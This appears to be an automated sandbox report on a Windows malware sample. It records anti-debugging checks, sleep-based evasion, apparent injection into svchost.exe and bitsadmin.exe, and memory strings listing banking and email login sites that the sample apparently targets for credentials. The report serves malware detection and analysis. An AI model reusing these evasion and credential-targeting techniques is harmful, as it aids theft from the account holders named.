                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-110939
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exe TID: 1384Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3500Thread sleep count: 1467 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3500Thread sleep time: -2934000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3500Thread sleep count: 8507 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3500Thread sleep time: -17014000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0327C640 FindFirstFileW,FindNextFileW,FindClose,7_2_0327C640
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
                Source: z5f52P3-.7.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: discord.comVMware20,11696494690f
                Source: z5f52P3-.7.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: z5f52P3-.7.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: z5f52P3-.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: z5f52P3-.7.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000ABA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: z5f52P3-.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: z5f52P3-.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: LbtMpScwNRqrVB.exe, 00000008.00000002.3897089325.0000000000F5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: z5f52P3-.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: z5f52P3-.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: z5f52P3-.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: z5f52P3-.7.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: z5f52P3-.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: z5f52P3-.7.drBinary or memory string: global block list test formVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: z5f52P3-.7.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: z5f52P3-.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: z5f52P3-.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: z5f52P3-.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: firefox.exe, 0000000A.00000002.1981365226.000001B8AA5AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeAPI call chain: ExitProcess graph end nodegraph_0-108765
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD096E rdtsc 3_2_02FD096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00437B23 LdrLoadDll,3_2_00437B23
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00574594 mov eax, dword ptr fs:[00000030h]0_2_00574594
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00A8A1B8 mov eax, dword ptr fs:[00000030h]0_2_00A8A1B8
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00A8B7F8 mov eax, dword ptr fs:[00000030h]0_2_00A8B7F8
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00A8B858 mov eax, dword ptr fs:[00000030h]0_2_00A8B858
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F11130 mov eax, dword ptr fs:[00000030h]0_2_02F11130
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F53F3D mov eax, dword ptr fs:[00000030h]0_2_02F53F3D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA02E1 mov eax, dword ptr fs:[00000030h]3_2_02FA02E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA02E1 mov eax, dword ptr fs:[00000030h]3_2_02FA02E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA02E1 mov eax, dword ptr fs:[00000030h]3_2_02FA02E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068324 mov eax, dword ptr fs:[00000030h]3_2_03068324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068324 mov ecx, dword ptr fs:[00000030h]3_2_03068324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068324 mov eax, dword ptr fs:[00000030h]3_2_03068324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068324 mov eax, dword ptr fs:[00000030h]3_2_03068324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F9A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F9A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F9A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F9A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F9A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306634F mov eax, dword ptr fs:[00000030h]3_2_0306634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038350 mov ecx, dword ptr fs:[00000030h]3_2_03038350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305A352 mov eax, dword ptr fs:[00000030h]3_2_0305A352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA02A0 mov eax, dword ptr fs:[00000030h]3_2_02FA02A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA02A0 mov eax, dword ptr fs:[00000030h]3_2_02FA02A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301035C mov eax, dword ptr fs:[00000030h]3_2_0301035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301035C mov eax, dword ptr fs:[00000030h]3_2_0301035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301035C mov eax, dword ptr fs:[00000030h]3_2_0301035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301035C mov ecx, dword ptr fs:[00000030h]3_2_0301035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301035C mov eax, dword ptr fs:[00000030h]3_2_0301035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301035C mov eax, dword ptr fs:[00000030h]3_2_0301035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCE284 mov eax, dword ptr fs:[00000030h]3_2_02FCE284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCE284 mov eax, dword ptr fs:[00000030h]3_2_02FCE284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303437C mov eax, dword ptr fs:[00000030h]3_2_0303437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8826B mov eax, dword ptr fs:[00000030h]3_2_02F8826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F94260 mov eax, dword ptr fs:[00000030h]3_2_02F94260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F94260 mov eax, dword ptr fs:[00000030h]3_2_02F94260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F94260 mov eax, dword ptr fs:[00000030h]3_2_02F94260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F96259 mov eax, dword ptr fs:[00000030h]3_2_02F96259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8A250 mov eax, dword ptr fs:[00000030h]3_2_02F8A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030163C0 mov eax, dword ptr fs:[00000030h]3_2_030163C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8823B mov eax, dword ptr fs:[00000030h]3_2_02F8823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304C3CD mov eax, dword ptr fs:[00000030h]3_2_0304C3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030343D4 mov eax, dword ptr fs:[00000030h]3_2_030343D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030343D4 mov eax, dword ptr fs:[00000030h]3_2_030343D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E3DB mov eax, dword ptr fs:[00000030h]3_2_0303E3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E3DB mov eax, dword ptr fs:[00000030h]3_2_0303E3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E3DB mov ecx, dword ptr fs:[00000030h]3_2_0303E3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E3DB mov eax, dword ptr fs:[00000030h]3_2_0303E3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FC63FF mov eax, dword ptr fs:[00000030h]3_2_02FC63FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FAE3F0 mov eax, dword ptr fs:[00000030h]3_2_02FAE3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FAE3F0 mov eax, dword ptr fs:[00000030h]3_2_02FAE3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FAE3F0 mov eax, dword ptr fs:[00000030h]3_2_02FAE3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA03E9 mov eax, dword ptr fs:[00000030h]3_2_02FA03E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA03E9 mov eax, dword ptr fs:[00000030h]3_2_02FA03E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA03E9 mov eax, dword ptr fs:[00000030h]3_2_02FA03E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA03E9 mov eax, dword ptr fs:[00000030h]3_2_02FA03E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA03E9 mov eax, dword ptr fs:[00000030h]3_2_02FA03E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA03E9 mov eax, dword ptr fs:[00000030h]3_2_02FA03E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA03E9 mov eax, dword ptr fs:[00000030h]3_2_02FA03E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA03E9 mov eax, dword ptr fs:[00000030h]3_2_02FA03E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F983C0 mov eax, dword ptr fs:[00000030h]3_2_02F983C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F983C0 mov eax, dword ptr fs:[00000030h]3_2_02F983C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F983C0 mov eax, dword ptr fs:[00000030h]3_2_02F983C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F983C0 mov eax, dword ptr fs:[00000030h]3_2_02F983C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F9A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F9A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F9A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F9A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F9A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F9A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03018243 mov eax, dword ptr fs:[00000030h]3_2_03018243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03018243 mov ecx, dword ptr fs:[00000030h]3_2_03018243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304A250 mov eax, dword ptr fs:[00000030h]3_2_0304A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304A250 mov eax, dword ptr fs:[00000030h]3_2_0304A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306625D mov eax, dword ptr fs:[00000030h]3_2_0306625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F88397 mov eax, dword ptr fs:[00000030h]3_2_02F88397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F88397 mov eax, dword ptr fs:[00000030h]3_2_02F88397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F88397 mov eax, dword ptr fs:[00000030h]3_2_02F88397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03040274 mov eax, dword ptr fs:[00000030h]3_2_03040274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8E388 mov eax, dword ptr fs:[00000030h]3_2_02F8E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8E388 mov eax, dword ptr fs:[00000030h]3_2_02F8E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8E388 mov eax, dword ptr fs:[00000030h]3_2_02F8E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB438F mov eax, dword ptr fs:[00000030h]3_2_02FB438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB438F mov eax, dword ptr fs:[00000030h]3_2_02FB438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03010283 mov eax, dword ptr fs:[00000030h]3_2_03010283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03010283 mov eax, dword ptr fs:[00000030h]3_2_03010283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03010283 mov eax, dword ptr fs:[00000030h]3_2_03010283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030262A0 mov eax, dword ptr fs:[00000030h]3_2_030262A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030262A0 mov ecx, dword ptr fs:[00000030h]3_2_030262A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030262A0 mov eax, dword ptr fs:[00000030h]3_2_030262A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030262A0 mov eax, dword ptr fs:[00000030h]3_2_030262A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030262A0 mov eax, dword ptr fs:[00000030h]3_2_030262A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030262A0 mov eax, dword ptr fs:[00000030h]3_2_030262A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030662D6 mov eax, dword ptr fs:[00000030h]3_2_030662D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8C310 mov ecx, dword ptr fs:[00000030h]3_2_02F8C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FB0310 mov ecx, dword ptr fs:[00000030h]3_2_02FB0310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCA30B mov eax, dword ptr fs:[00000030h]3_2_02FCA30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCA30B mov eax, dword ptr fs:[00000030h]3_2_02FCA30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCA30B mov eax, dword ptr fs:[00000030h]3_2_02FCA30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8C0F0 mov eax, dword ptr fs:[00000030h]3_2_02F8C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD20F0 mov ecx, dword ptr fs:[00000030h]3_2_02FD20F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E10E mov eax, dword ptr fs:[00000030h]3_2_0303E10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E10E mov ecx, dword ptr fs:[00000030h]3_2_0303E10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E10E mov eax, dword ptr fs:[00000030h]3_2_0303E10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E10E mov eax, dword ptr fs:[00000030h]3_2_0303E10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E10E mov ecx, dword ptr fs:[00000030h]3_2_0303E10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E10E mov eax, dword ptr fs:[00000030h]3_2_0303E10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E10E mov eax, dword ptr fs:[00000030h]3_2_0303E10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E10E mov ecx, dword ptr fs:[00000030h]3_2_0303E10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E10E mov eax, dword ptr fs:[00000030h]3_2_0303E10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E10E mov ecx, dword ptr fs:[00000030h]3_2_0303E10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03050115 mov eax, dword ptr fs:[00000030h]3_2_03050115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F980E9 mov eax, dword ptr fs:[00000030h]3_2_02F980E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8A0E3 mov ecx, dword ptr fs:[00000030h]3_2_02F8A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A118 mov ecx, dword ptr fs:[00000030h]3_2_0303A118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A118 mov eax, dword ptr fs:[00000030h]3_2_0303A118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A118 mov eax, dword ptr fs:[00000030h]3_2_0303A118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A118 mov eax, dword ptr fs:[00000030h]3_2_0303A118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03024144 mov eax, dword ptr fs:[00000030h]3_2_03024144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03024144 mov eax, dword ptr fs:[00000030h]3_2_03024144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03024144 mov ecx, dword ptr fs:[00000030h]3_2_03024144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03024144 mov eax, dword ptr fs:[00000030h]3_2_03024144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03024144 mov eax, dword ptr fs:[00000030h]3_2_03024144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F880A0 mov eax, dword ptr fs:[00000030h]3_2_02F880A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028158 mov eax, dword ptr fs:[00000030h]3_2_03028158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03064164 mov eax, dword ptr fs:[00000030h]3_2_03064164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03064164 mov eax, dword ptr fs:[00000030h]3_2_03064164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9208A mov eax, dword ptr fs:[00000030h]3_2_02F9208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034180 mov eax, dword ptr fs:[00000030h]3_2_03034180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034180 mov eax, dword ptr fs:[00000030h]3_2_03034180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FBC073 mov eax, dword ptr fs:[00000030h]3_2_02FBC073
